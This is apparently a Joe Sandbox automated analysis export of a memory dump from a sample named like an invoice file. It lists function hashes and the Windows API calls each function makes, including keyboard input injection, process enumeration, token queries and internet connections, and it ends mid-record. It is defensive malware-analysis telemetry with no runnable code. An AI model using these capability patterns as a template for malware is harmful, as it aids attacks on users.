                                                                            • Instruction ID: 7e46a8f8ace38ea940f9a074257ee4d317f190977268d1d4eae7540321eccc80
                                                                            • Opcode Fuzzy Hash: df2f4602445ef405dbf79786d414d4a9a4be5db1c385479ab130a9d95014323f
                                                                            • Instruction Fuzzy Hash: AE31C334A40108EEEB219B58CC45BB97BA5EB057A3F944112FF11F62A1CE31D94ABB53
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5AB60
                                                                            • GetWindowRect.USER32(?,?), ref: 00F5ABD6
                                                                            • PtInRect.USER32(?,?,00F5C014), ref: 00F5ABE6
                                                                            • MessageBeep.USER32(00000000), ref: 00F5AC57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 1daca0275b788bcf32442ffa1af9ff75f24a217ba4e04f737faead1fcf941797
                                                                            • Instruction ID: b1dcdfc60822197e9bab03916520796e5f4430ffd0a94982afb75810385e44a1
                                                                            • Opcode Fuzzy Hash: 1daca0275b788bcf32442ffa1af9ff75f24a217ba4e04f737faead1fcf941797
                                                                            • Instruction Fuzzy Hash: ED41B330A00208DFCB12DF58C888B597BF5FF49712F1882A5EE559B364D730E859EB92
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F30B27
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F30B43
                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F30BA9
                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F30BFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 1751e7025c63809268fab338b6c3aeed4e2d4673d994de639b64a0aa84680376
                                                                            • Instruction ID: 8ecb7cf50f52f0e6d483cc7ec8839d88cbfe25dd6fcd0478c39fa4a2ff026952
                                                                            • Opcode Fuzzy Hash: 1751e7025c63809268fab338b6c3aeed4e2d4673d994de639b64a0aa84680376
                                                                            • Instruction Fuzzy Hash: BA314B70D40318AEFB308B298C15BFAFBA9AB85335F08436BF581D21D1CB748944B755
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00F30C66
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F30C82
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F30CE1
                                                                            • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00F30D33
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 440cbbb193ac4aede1b694122ea938306ace59fc1c81ad6c07669cd5a548e03e
                                                                            • Instruction ID: 95e967f030b0582a5a357e2fbafd5752e1214ce7adae60fb4fd8d07d64627e92
                                                                            • Opcode Fuzzy Hash: 440cbbb193ac4aede1b694122ea938306ace59fc1c81ad6c07669cd5a548e03e
                                                                            • Instruction Fuzzy Hash: 3F313730E403186EFF308A648C247FEBBA5AB45331F08536BE481621D1DB799945F7A1
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F061FB
                                                                            • __isleadbyte_l.LIBCMT ref: 00F06229
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F06257
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F0628D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 424552d61c6ec4e294cd9a5fb72ecc7c32918dfe7eabc2864c1f4338e4bfb37a
                                                                            • Instruction ID: 30766830516139f655a154318dca1dbc657b359ac4b8fd175960d4cb57036f2d
                                                                            • Opcode Fuzzy Hash: 424552d61c6ec4e294cd9a5fb72ecc7c32918dfe7eabc2864c1f4338e4bfb37a
                                                                            • Instruction Fuzzy Hash: 8031AE31A0424AAFDF218F65CC44BBA7BA9BF41720F154029F864D71E1D731D960FB90
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00F54F02
                                                                              • Part of subcall function 00F33641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F3365B
                                                                              • Part of subcall function 00F33641: GetCurrentThreadId.KERNEL32 ref: 00F33662
                                                                              • Part of subcall function 00F33641: AttachThreadInput.USER32(00000000,?,00F35005), ref: 00F33669
                                                                            • GetCaretPos.USER32(?), ref: 00F54F13
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00F54F4E
                                                                            • GetForegroundWindow.USER32 ref: 00F54F54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 083215c2560347936aa670782d0df936708c10fb42eb60e3c94fd9fc6088f22c
                                                                            • Instruction ID: a6b091762e29133e1cdffc7d7ced1c86a9d0dde80410173ecbe3eb87ad04f0ab
                                                                            • Opcode Fuzzy Hash: 083215c2560347936aa670782d0df936708c10fb42eb60e3c94fd9fc6088f22c
                                                                            • Instruction Fuzzy Hash: 0A312D71D00208AFCB00EFA5CC859EFB7F9EF88304F10406AE915E7241EA75AE459BA0
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F33C7A
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F33C88
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F33CA8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F33D52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 3116973660b975d59c1054e3b465800e977e62b6dd0bae319d62dfbf63e1dd86
                                                                            • Instruction ID: 21344ac372dd04ec680fe79f11583cec44087a2deecde15c3ffd4f5408185053
                                                                            • Opcode Fuzzy Hash: 3116973660b975d59c1054e3b465800e977e62b6dd0bae319d62dfbf63e1dd86
                                                                            • Instruction Fuzzy Hash: 0231C8711083059FD300EF54D881ABFBBE8EF95364F50082DF5D1962A1EB71DA4ADB92
                                                                            APIs
                                                                              • Part of subcall function 00F2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28121
                                                                              • Part of subcall function 00F2810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F2812B
                                                                              • Part of subcall function 00F2810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F2813A
                                                                              • Part of subcall function 00F2810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F28141
                                                                              • Part of subcall function 00F2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28157
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F286A3
                                                                            • _memcmp.LIBCMT ref: 00F286C6
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F286FC
                                                                            • HeapFree.KERNEL32(00000000), ref: 00F28703
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 2182266621-0
                                                                            • Opcode ID: d813bd575847d6847609449f20fcfd422544ba9d54e6c3db394700b5d86355cf
                                                                            • Instruction ID: 74c3b8e0aa7edcaa104b6f38d2d66afeefdc841668abbc936cbbaa3fa3daf34a
                                                                            • Opcode Fuzzy Hash: d813bd575847d6847609449f20fcfd422544ba9d54e6c3db394700b5d86355cf
                                                                            • Instruction Fuzzy Hash: 7E21C131E0221CEFDB10DFA4D948BEEBBB8EF50355F144099E405A7241DB30AE06EB50
                                                                            APIs
                                                                            • __setmode.LIBCMT ref: 00EF09AE
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37896,?,?,00000000), ref: 00ED5A2C
                                                                              • Part of subcall function 00ED5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37896,?,?,00000000,?,?), ref: 00ED5A50
                                                                            • _fprintf.LIBCMT ref: 00EF09E5
                                                                            • OutputDebugStringW.KERNEL32(?), ref: 00F25DBB
                                                                              • Part of subcall function 00EF4AAA: _flsall.LIBCMT ref: 00EF4AC3
                                                                            • __setmode.LIBCMT ref: 00EF0A1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            • Opcode ID: f60c51fbb98cbafda217ce9121b1fc17c1c22b39eda41e912ef67766b13ad05d
                                                                            • Instruction ID: 4e0377e5c8c605270714fa6d1df78b26c0dd6edb2bcf5ac0d7d5c5b3a6c172bf
                                                                            • Opcode Fuzzy Hash: f60c51fbb98cbafda217ce9121b1fc17c1c22b39eda41e912ef67766b13ad05d
                                                                            • Instruction Fuzzy Hash: F91102B290460C6BDB08B3B4AC469BEB7E9DF81360F241056F304B72C3EE304846A7A5
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F417A3
                                                                              • Part of subcall function 00F4182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F4184C
                                                                              • Part of subcall function 00F4182D: InternetCloseHandle.WININET(00000000), ref: 00F418E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: b0a4e5b6257c9884dae7f9884ddde35a50aad6ce46d488515d34c0b58b0645cc
                                                                            • Instruction ID: 7494d18bdd257d7f90b038cc42e5cc7d3f985bce1d07193f92b65d98b8520b63
                                                                            • Opcode Fuzzy Hash: b0a4e5b6257c9884dae7f9884ddde35a50aad6ce46d488515d34c0b58b0645cc
                                                                            • Instruction Fuzzy Hash: 9921AE36600705BFEB129F60DC01FBABFA9FF48711F10402AFE5196651DB759851BBA0
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00F5FAC0), ref: 00F33A64
                                                                            • GetLastError.KERNEL32 ref: 00F33A73
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F33A82
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F5FAC0), ref: 00F33ADF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: e8444cfde01d29d17dafaa2de328a4404b53e5c766a8684f9fd5a37fd803f118
                                                                            • Instruction ID: eda9f7841fb3f17d450b62311325cdcd0e59730d0f7e6e0e62f054407f24beb4
                                                                            • Opcode Fuzzy Hash: e8444cfde01d29d17dafaa2de328a4404b53e5c766a8684f9fd5a37fd803f118
                                                                            • Instruction Fuzzy Hash: 9921B1755083058F8700EF28C88186ABBE8EF55374F104A6AF4D9C72A1E735DA0AEB42
                                                                            APIs
                                                                              • Part of subcall function 00F2F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F2DCD3,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?), ref: 00F2F0CB
                                                                              • Part of subcall function 00F2F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F2DCD3,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2F0F1
                                                                              • Part of subcall function 00F2F0BC: lstrcmpiW.KERNEL32(00000000,?,00F2DCD3,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?), ref: 00F2F122
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2DCEC
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2DD12
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F2EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F2DD46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 5c87a4b39908b13daddd56ebbfa8578965c213fc635dda9dad1e70766496e3c4
                                                                            • Instruction ID: 1cc1b8b764eae9771428ca2d71ccf6a000411098f72ad27ef6edea01968c6393
                                                                            • Opcode Fuzzy Hash: 5c87a4b39908b13daddd56ebbfa8578965c213fc635dda9dad1e70766496e3c4
                                                                            • Instruction Fuzzy Hash: A811D33A600319EBDB25AF34EC45D7A77A8FF45310B80506AF906CB2A1EB71D841E7D1
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00F05101
                                                                              • Part of subcall function 00EF571C: __FF_MSGBANNER.LIBCMT ref: 00EF5733
                                                                              • Part of subcall function 00EF571C: __NMSG_WRITE.LIBCMT ref: 00EF573A
                                                                              • Part of subcall function 00EF571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001), ref: 00EF575F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free
                                                                            • String ID:
                                                                            • API String ID: 614378929-0
                                                                            • Opcode ID: c05e9a3f88fb06b10be24493e3639f047e5d1a0abb5b9f33dd20afd1ba3cb3fc
                                                                            • Instruction ID: 9852fb06b7bd36bbdb6dc09562e783204d71ca9b2c205a30d1d3afeb37861324
                                                                            • Opcode Fuzzy Hash: c05e9a3f88fb06b10be24493e3639f047e5d1a0abb5b9f33dd20afd1ba3cb3fc
                                                                            • Instruction Fuzzy Hash: 19110672A04A1DAECF312F70AC0577F37D89F10771B10192AFB04AA1E0DEB08840BB90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00ED44CF
                                                                              • Part of subcall function 00ED407C: _memset.LIBCMT ref: 00ED40FC
                                                                              • Part of subcall function 00ED407C: _wcscpy.LIBCMT ref: 00ED4150
                                                                              • Part of subcall function 00ED407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ED4160
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00ED4524
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ED4533
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F0D4B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: 2f4b4cf02cc61711486b0ac9cde6a28d981fc50fb7553cca0d3c6f0f705b2bc6
                                                                            • Instruction ID: 7eae647987063b0f1865651e8c0d6535e2d2c53e130c428598543b258ac7053f
                                                                            • Opcode Fuzzy Hash: 2f4b4cf02cc61711486b0ac9cde6a28d981fc50fb7553cca0d3c6f0f705b2bc6
                                                                            • Instruction Fuzzy Hash: BA21F5B4904788AFE732CB649855BE6BBECDB15318F04109EE78E662C1C3742A85EB41
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F285E2
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00F285E9
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00F28603
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F28632
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
